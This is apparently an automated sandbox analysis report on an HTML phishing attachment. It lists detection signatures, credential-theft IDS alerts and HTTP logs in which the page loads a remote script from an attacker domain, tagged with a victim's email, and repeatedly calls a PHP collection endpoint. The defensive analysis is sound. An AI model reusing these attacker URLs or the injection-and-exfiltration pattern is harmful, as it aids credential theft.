Edit tour

Windows Analysis Report
Play_VM-Now(apply)VWAV.xhtml

Overview

General Information

Sample name:	Play_VM-Now(apply)VWAV.xhtml
Analysis ID:	1647117
MD5:	18ab9c88e454f2a247243928a1c06b41
SHA1:	a74b9d781c715c8c5e3b252c78a75726649e65f7
SHA256:	c86babeebb79b78763d3b731584c737e88c07c40ab92ab80bc65d90439c2d891
Infos:

Detection

HTMLPhisher

Score:	84
Range:	0 - 100
Confidence:	100%

Signatures

AI detected phishing page

Suricata IDS alerts for network traffic

Yara detected HtmlPhish10

AI detected suspicious Javascript

HTML IFrame injector detected

HTML Script injector detected

HTML document with suspicious name

Suspicious Javascript code found in HTML file

Creates files inside the system directory

Deletes files inside the Windows folder

Detected TCP or UDP traffic on non-standard ports

HTML body contains low number of good links

HTML body contains password input but no form action

IP address seen in connection with other malware

Invalid 'forgot password' link found

No HTML title found

None HTTPS page querying sensitive user data (password, username or email)

Classification

Process Tree

System is w10x64

chrome.exe (PID: 6432 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 6752 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2036,i,11596865098704793263,5756028737724251983,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2044 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)

chrome.exe (PID: 6860 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\Play_VM-Now(apply)VWAV.xhtml" MD5: E81F54E6C1129887AEA47E7D092680BF)

cleanup

Yara Signatures

HTML

Source	Rule	Description	Author
0.6.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
0.2.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
0.4.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security
0.5.pages.csv	JoeSecurity_HtmlPhish_10	Yara detected HtmlPhish_10	Joe Security

Suricata Signatures

ETPRO PHISHING Successful Generic Phish 2021-03-25

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-24T14:43:05.350103+0100	2847819	1	Successful Credential Theft Detected	192.168.2.6	49729	104.168.138.190	443	TCP
2025-03-24T14:43:33.074247+0100	2847819	1	Successful Credential Theft Detected	192.168.2.6	49740	104.168.138.190	443	TCP
2025-03-24T14:43:44.815622+0100	2847819	1	Successful Credential Theft Detected	192.168.2.6	49752	104.168.138.190	443	TCP
2025-03-24T14:43:53.679145+0100	2847819	1	Successful Credential Theft Detected	192.168.2.6	49757	104.168.138.190	443	TCP
2025-03-24T14:44:05.620879+0100	2847819	1	Successful Credential Theft Detected	192.168.2.6	49762	104.168.138.190	443	TCP
2025-03-24T14:44:14.551242+0100	2847819	1	Successful Credential Theft Detected	192.168.2.6	49767	104.168.138.190	443	TCP
2025-03-24T14:45:05.977422+0100	2847819	1	Successful Credential Theft Detected	192.168.2.6	49773	104.168.138.190	443	TCP
2025-03-24T14:45:14.939093+0100	2847819	1	Successful Credential Theft Detected	192.168.2.6	49778	104.168.138.190	443	TCP

Joe Sandbox Signatures

• Phishing
• Compliance
• Networking
• System Summary

Click to jump to signature section

Show All Signature Results

Phishing

AI detected phishing page

Source: file:///C:/Users/user/Desktop/Play_VM-Now(apply)VWAV.xhtml

Joe Sandbox AI: Score: 10 Reasons: HTML file with login form DOM: 0.6.pages.csv

Yara detected HtmlPhish10

Source: Yara match	File source: 0.6.pages.csv, type: HTML
Source: Yara match	File source: 0.2.pages.csv, type: HTML
Source: Yara match	File source: 0.4.pages.csv, type: HTML
Source: Yara match	File source: 0.5.pages.csv, type: HTML

AI detected suspicious Javascript

Source: 0.0..script.csv

Joe Sandbox AI: Detected suspicious JavaScript with source url: file:///C:/Users/user/Desktop/Play_VM-Now(appl... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and the use of obfuscated URLs. The script creates an iframe, writes HTML content to it, and then loads an external script from a suspicious domain. This suggests potential malicious intent, such as credential theft or other types of attacks.

HTML IFrame injector detected

Source: file:///C:/Users/user/Desktop/Play_VM-Now(apply)VWAV.xhtml

HTTP Parser: New IFrame

HTML Script injector detected

Source: file:///C:/Users/user/Desktop/Play_VM-Now(apply)VWAV.xhtml	HTTP Parser: New script, src: https://office.avcbtech.store/fuk/xls/f1u2k.js?uid=apply@peo.on.ca
Source: file:///C:/Users/user/Desktop/Play_VM-Now(apply)VWAV.xhtml	HTTP Parser: New script, src: https://office.avcbtech.store/fuk/xls/f1u2k.js?uid=apply@peo.on.ca
Source: file:///C:/Users/user/Desktop/Play_VM-Now(apply)VWAV.xhtml	HTTP Parser: New script, src: https://office.avcbtech.store/fuk/xls/f1u2k.js?uid=apply@peo.on.ca
Source: file:///C:/Users/user/Desktop/Play_VM-Now(apply)VWAV.xhtml	HTTP Parser: New script, src: https://office.avcbtech.store/fuk/xls/f1u2k.js?uid=apply@peo.on.ca
Source: file:///C:/Users/user/Desktop/Play_VM-Now(apply)VWAV.xhtml	HTTP Parser: New script, src: https://office.avcbtech.store/fuk/xls/f1u2k.js?uid=apply@peo.on.ca

Suspicious Javascript code found in HTML file

Source: Play_VM-Now(apply)VWAV.xhtml	HTTP Parser: .location
Source: Play_VM-Now(apply)VWAV.xhtml	HTTP Parser: .location

Source: file:///C:/Users/user/Desktop/Play_VM-Now(apply)VWAV.xhtml

HTTP Parser: Number of links: 0

Source: file:///C:/Users/user/Desktop/Play_VM-Now(apply)VWAV.xhtml

HTTP Parser: <input type="password" .../> found but no <form action="...

Source: file:///C:/Users/user/Desktop/Play_VM-Now(apply)VWAV.xhtml

HTTP Parser: Invalid link: Forgot Password?

Source: file:///C:/Users/user/Desktop/Play_VM-Now(apply)VWAV.xhtml	HTTP Parser: HTML title missing
Source: file:///C:/Users/user/Desktop/Play_VM-Now(apply)VWAV.xhtml	HTTP Parser: HTML title missing
Source: file:///C:/Users/user/Desktop/Play_VM-Now(apply)VWAV.xhtml	HTTP Parser: HTML title missing
Source: file:///C:/Users/user/Desktop/Play_VM-Now(apply)VWAV.xhtml	HTTP Parser: HTML title missing

Source: file:///C:/Users/user/Desktop/Play_VM-Now(apply)VWAV.xhtml

HTTP Parser: Has password / email / username input fields

Source: file:///C:/Users/user/Desktop/Play_VM-Now(apply)VWAV.xhtml

HTTP Parser: <input type="password" .../> found

Source: Play_VM-Now(apply)VWAV.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Play_VM-Now(apply)VWAV.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Play_VM-Now(apply)VWAV.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Play_VM-Now(apply)VWAV.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Play_VM-Now(apply)VWAV.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Play_VM-Now(apply)VWAV.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Play_VM-Now(apply)VWAV.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/Play_VM-Now(apply)VWAV.xhtml	HTTP Parser: No favicon

Source: file:///C:/Users/user/Desktop/Play_VM-Now(apply)VWAV.xhtml	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/Play_VM-Now(apply)VWAV.xhtml	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/Play_VM-Now(apply)VWAV.xhtml	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/Play_VM-Now(apply)VWAV.xhtml	HTTP Parser: No <meta name="author".. found

Source: file:///C:/Users/user/Desktop/Play_VM-Now(apply)VWAV.xhtml	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/Play_VM-Now(apply)VWAV.xhtml	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/Play_VM-Now(apply)VWAV.xhtml	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/Play_VM-Now(apply)VWAV.xhtml	HTTP Parser: No <meta name="copyright".. found

Source: unknown	HTTPS traffic detected: 142.251.40.196:443 -> 192.168.2.6:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 139.28.36.38:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.174.100.20:443 -> 192.168.2.6:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 151.101.2.137:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.196.193:443 -> 192.168.2.6:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.196.193:443 -> 192.168.2.6:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.196.193:443 -> 192.168.2.6:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 199.232.196.193:443 -> 192.168.2.6:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.6:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.6:49727 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.168.138.190:443 -> 192.168.2.6:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.168.138.190:443 -> 192.168.2.6:49734 version: TLS 1.2

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.6:49757 -> 104.168.138.190:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.6:49729 -> 104.168.138.190:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.6:49778 -> 104.168.138.190:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.6:49752 -> 104.168.138.190:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.6:49762 -> 104.168.138.190:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.6:49773 -> 104.168.138.190:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.6:49767 -> 104.168.138.190:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.6:49740 -> 104.168.138.190:443

Source: global traffic

TCP traffic: 192.168.2.6:49725 -> 185.174.100.76:8233

Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View	IP Address: 185.174.100.20 185.174.100.20

Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.42.65.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.203.176.221
Source: unknown	TCP traffic detected without corresponding DNS query: 23.203.176.221
Source: unknown	TCP traffic detected without corresponding DNS query: 23.203.176.221
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.41.3
Source: unknown	TCP traffic detected without corresponding DNS query: 142.251.41.3
Source: unknown	TCP traffic detected without corresponding DNS query: 23.219.82.9
Source: unknown	TCP traffic detected without corresponding DNS query: 23.203.176.221
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.215
Source: unknown	TCP traffic detected without corresponding DNS query: 2.23.227.215
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.16.164
Source: unknown	TCP traffic detected without corresponding DNS query: 40.126.16.164
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.69.3
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.69.3
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.69.3
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.69.3
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.69.3
Source: unknown	TCP traffic detected without corresponding DNS query: 184.31.69.3
Source: unknown	TCP traffic detected without corresponding DNS query: 20.191.45.158
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /fuk/xls/f1u2k.js?uid=apply@peo.on.ca HTTP/1.1Host: office.avcbtech.storeConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /start/xls/includes/css6.css HTTP/1.1Host: sender.linxcoded.topConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.1.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /0HdPsKK.png HTTP/1.1Host: i.imgur.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /KAb5SEy.png HTTP/1.1Host: i.imgur.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /0HdPsKK.png HTTP/1.1Host: i.imgur.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /KAb5SEy.png HTTP/1.1Host: i.imgur.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=88cf9e4293a3b3e0e66e09d525835781
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=88cf9e4293a3b3e0e66e09d525835781
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=88cf9e4293a3b3e0e66e09d525835781
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=88cf9e4293a3b3e0e66e09d525835781
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fuk/xwps.php HTTP/1.1Host: avcbtech.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=88cf9e4293a3b3e0e66e09d525835781
